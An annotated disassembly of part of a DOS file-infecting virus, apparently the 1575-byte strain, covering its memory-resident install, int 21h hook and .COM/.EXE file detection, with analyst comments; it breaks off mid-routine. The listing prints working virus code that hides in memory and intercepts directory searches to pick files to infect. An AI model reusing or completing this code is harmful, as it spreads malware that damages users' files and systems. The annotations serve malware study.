;══════════════════════════════════════════════════════════════════════════
; SUBROUTINE
;──────────────────────────────────────────────────────────────────────────
;-----------------------------------------------------------------------
; sub_6 -- residency check / install routine (16-bit real mode, DOS)
; In:    cs = the code segment this listing lives in; data_31 is presumably
;        the load (PSP) segment -- confirm from the data segment dump
; Out:   no register result; ax, es, ds are saved and restored
; Side:  if not already resident and the program owns the last MCB with
;        enough room: shrinks that MCB, copies 627h bytes from cs:100h to the
;        carved-off segment and rewrites the int 21h vector at 0000:0084
; Clobb: si, cx, dx, di, flags
;-----------------------------------------------------------------------
sub_6 proc near
push ax
push es
push ds
xor ax,ax ; es = 0000h: the interrupt vector table
mov es,ax
mov si,86h ; 0000:0086 = segment word of the int 21h vector (21h*4 + 2)
mov ax,es:[si]
mov ds,ax ; ds = segment of the current int 21h handler
mov si,725h
cmp word ptr [si],0A0Ch ; marker word at handler_seg:725h -- already resident?
jne loc_14 ; not resident: go install
push ds
pop ax ; ax = segment of the resident copy
call sub_13 ; (0611) -- outside this listing; receives that segment in ax
pop ds
pop es
pop ax
retn
loc_14:
push cs
pop ds ; ds = cs for the data_xx reads below
mov ax,data_31 ; presumably the load (PSP) segment -- confirm
dec ax
mov es,ax ; es = segment-1: the DOS memory control block (MCB) that precedes the program
cmp byte ptr es:[0],5Ah ; 'Z' = MCB signature of the last block in the chain
je loc_15
jmp short loc_16 ; (04B4) -- not the last MCB: leave without installing
db 90h ; nop padding left by the assembler, not code
loc_15:
mov ax,es:data_9e ; presumably the MCB size field in paragraphs -- confirm
mov cx,737h
shr cx,1 ; cx = 737h >> 4 = 73h paragraphs (730h bytes): the amount to carve off
shr cx,1
shr cx,1
shr cx,1
sub ax,cx
jc loc_16 ; block smaller than 73h paragraphs: do not install
mov es:data_9e,ax ; shrink the block by 73h paragraphs
sub es:data_10e,cx ; presumably the PSP top-of-memory word (MCB+12h = PSP:0002) -- confirm
push cs
pop ds
mov ax,es:data_10e ; ax = segment of the carved-off paragraphs
push ax
pop es ; es = destination segment
mov si,100h
push si
pop di ; ds:si = cs:100h, es:di = newseg:100h (same offsets: the copy stays position-dependent)
mov cx,627h ; 627h = 1575 bytes: the body length that gives this virus its name
cld
repne movsb ; movsb never sets ZF, so REPNE behaves as a plain REP here
push es ; save the new segment (ax still holds it as well)
sub ax,ax
mov es,ax ; es = 0000h again
mov si,84h ; 0000:0084 = offset word of the int 21h vector
mov dx,4A8h
mov es:[si],dx ; new handler offset 04A8h (an offset inside the relocated copy)
inc si
inc si
pop ax ; ax = the new segment
mov es:[si],ax ; new handler segment: int 21h now points into the copy
loc_16:
pop ds
pop es
pop ax
retn
sub_6 endp
; The three db lines below were left undecoded by the disassembler. Read as x86 they are:
;   3C 57     cmp al,57h        75 03  jne +3 (skips the jmp and its nop)
;   EB 1E     jmp short +1Eh    -> lands on loc_19 (pass to original handler)
;   90        nop
;   80 FC 1A  cmp ah,1Ah        75 06  jne +6 -> loc_17
;   E8 17 01  call +0117h       EB 13  jmp short +13h -> loc_19
;   90        nop
; So this appears to be the int 21h hook entry: al=57h (the marker that sub_7 and
; sub_10 load before re-issuing int 21h) bypasses the hook, ah=1Ah (set DTA) is
; handled by the called routine, everything else falls through to loc_17.
db 3Ch, 57h, 75h, 3, 0EBh, 1Eh
db 90h, 80h, 0FCh, 1Ah, 75h, 6
db 0E8h, 17h, 1, 0EBh, 13h, 90h
loc_17:
cmp ah,11h ; ah=11h: FCB find-first
jne loc_18
call sub_7 ; (04E1) -- performs the real call, then post-processes the result
iret ; return to the interrupted caller with the registers sub_7 leaves
loc_18:
cmp ah,12h ; ah=12h: FCB find-next
jne loc_19
call sub_10 ; (059C)
iret
loc_19:
jmp dword ptr cs:data_11 ; any other function: far jump through the pointer at cs:data_11 (presumably the saved original vector)
;══════════════════════════════════════════════════════════════════════════
; SUBROUTINE
;──────────────────────────────────────────────────────────────────────────
;-----------------------------------------------------------------------
; sub_7 -- int 21h hook handler for ah=11h (FCB find-first)
; In:    ah = 11h, other registers as the interrupted caller left them
; Out:   all registers exactly as the real int 21h call returned them
;        (pushed right after the call, popped before retn)
; Side:  clears cs:data_35; when sub_8 reports a .COM/.EXE name (ZF=1)
;        and sub_2 returns ZF=0, calls sub_15 and decrements ds:data_6e
;        (sub_2, sub_15, data_35, data_6e are outside this listing)
;-----------------------------------------------------------------------
sub_7 proc near
mov al,57h ; al=57h: pass-through marker tested by the hook entry (cmp al,57h)
int 21h ; re-issue the caller's find-first; the hook forwards it to the original handler
; (the disassembler's "function 00h / terminate" auto-comment was wrong: ah is the caller's 11h)
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds
push cs
pop es ; ds = es = cs
mov byte ptr cs:data_35,0 ; flag tested at the start of sub_10 (find-next); 0 after a find-first
nop
call sub_8 ; (0514) ZF=1 when the found name has a .COM or .EXE extension
jnz loc_20 ; neither: nothing further to do
call sub_2 ; (023D) -- outside this listing
jz loc_20
call sub_15 ; (065A) -- outside this listing
dec byte ptr ds:data_6e
loc_20:
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
sub_7 endp
;══════════════════════════════════════════════════════════════════════════
; SUBROUTINE
;──────────────────────────────────────────────────────────────────────────
;-----------------------------------------------------------------------
; sub_8 -- classify the file name returned by find-first/next by extension
; In:    ds = cs (set by the caller); cs:data_27 / cs:data_28 = FCB pointer
;        consumed by sub_9
; Out:   ZF=1 and ds:[724h] = 'C' or 'E' when the name built at cs:219h
;        ends in .COM or .EXE; ZF=0 otherwise (also when sub_9 fails: its
;        CF=1 path leaves di = 219h, so "cmp di,0" yields ZF=0)
; Clobb: es (= cs), al, cx, di, flags
;-----------------------------------------------------------------------
sub_8 proc near
push cs
pop es
push cs
pop es ; duplicate of the previous pair; harmless (es = cs)
cld ; sub_9 and the scasb below walk forward
call sub_9 ; (0552) build "D:NAME.EXT",0 at es:219h; CF=1 on an unusable drive byte
jnc loc_21
cmp di,0 ; failure: di is 219h here, so ZF=0 is returned as "no match"
retn
loc_21:
mov di,219h
mov al,2Eh ; '.'
mov cx,0Bh ; scan at most 11 bytes of the built name for the '.'
repne scasb ; on a hit di points just past the '.', i.e. at the extension
; NOTE: if no '.' is found within 11 bytes, di = 224h and the compares below read
; past the name (see the 8-character-name remark in sub_9)
cmp word ptr [di],4F43h ; 'CO' (little-endian: 43h 'C', 4Fh 'O')
jne loc_22
cmp byte ptr [di+2],4Dh ; 'M' -> ".COM"
jne loc_22
mov byte ptr ds:[724h],43h ; 'C': record the file type; ZF=1 from the compare survives the mov
nop
retn
loc_22:
cmp word ptr [di],5845h ; 'EX' (45h 'E', 58h 'X')
jne loc_ret_23 ; ZF=0: neither .COM nor .EXE
cmp byte ptr [di+2],45h ; 'E' -> ".EXE"
jne loc_ret_23
mov byte ptr ds:[724h],45h ; 'E': record the file type (724h sits next to the 725h marker word tested by sub_6)
nop
loc_ret_23:
retn
sub_8 endp
;══════════════════════════════════════════════════════════════════════════
; SUBROUTINE
;──────────────────────────────────────────────────────────────────────────
;-----------------------------------------------------------------------
; sub_9 -- convert the FCB at cs:data_28 : cs:data_27 into ASCIIZ "D:NAME.EXT" at es:219h
; In:    es = cs; DF = 0; cs:data_27 (offset) / cs:data_28 (segment) = FCB
;        address -- presumably the caller's DTA recorded by the hook; confirm
; Out:   CF=0: NUL-terminated string at es:219h, di just past the NUL
;        CF=1: drive byte >= 5 (invalid), nothing written, di = 219h
; Clobb: ax, cx, si, di, flags (ds is preserved)
;-----------------------------------------------------------------------
sub_9 proc near
loc_24:
push ds
mov si,cs:data_27
mov ax,cs:data_28
mov ds,ax ; ds:si = the FCB
mov di,219h ; es:di = output buffer
lodsb ; first byte: FFh marks an extended FCB
cmp al,0FFh
jne loc_25
add si,6 ; extended FCB: skip 5 reserved bytes + the attribute byte
lodsb ; al = drive byte of the embedded normal FCB
jmp short loc_26 ; (0574)
db 90h ; nop padding, not code
loc_25:
cmp al,5 ; drive byte 0..4 (default, A: .. D:) accepted
jb loc_26 ; unsigned compare, as a drive number needs
pop ds
stc ; CF=1: unusable drive byte
retn
loc_26:
mov cx,0Bh ; 11 name bytes follow: 8 name + 3 extension, space padded
cmp al,0
je locloop_27 ; drive 0 = default drive: no "D:" prefix
add al,40h ; 1 -> 'A', 2 -> 'B', ...
stosb
mov al,3Ah ; ':'
stosb
locloop_27:
lodsb
cmp al,20h ; ' ' padding byte?
je loc_28
stosb ; ordinary character: copy it
jmp short loc_29 ; (0594)
db 90h ; nop padding, not code
loc_28:
cmp byte ptr es:[di-1],2Eh ; '.' already emitted for this run of spaces?
je loc_29
mov al,2Eh ; '.'
stosb ; the first space of a run becomes the '.' separator
loc_29:
loop locloop_27
; NOTE: a name that fills all 8 characters has no padding space, so no '.' is
; emitted between name and extension ("FILENAMEEXT") and sub_8's '.'-scan finds
; none within 11 bytes; padding spaces in the extension leave a trailing '.'.
mov al,0
stosb ; NUL terminator
pop ds
clc ; CF=0: success
retn
sub_9 endp
;══════════════════════════════════════════════════════════════════════════
; SUBROUTINE
;──────────────────────────────────────────────────────────────────────────
sub_10 proc near
mov al,57h ; 'W'
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds
push cs
pop es
cmp byte ptr cs:data_35,0
je loc_30 ; Jump if equal
jmp short loc_31 ; (05D3)
db 90h
loc_30:
call sub_8 ; (0514)
jnz loc_31 ; Jump if not zero
call sub_2 ; (023D)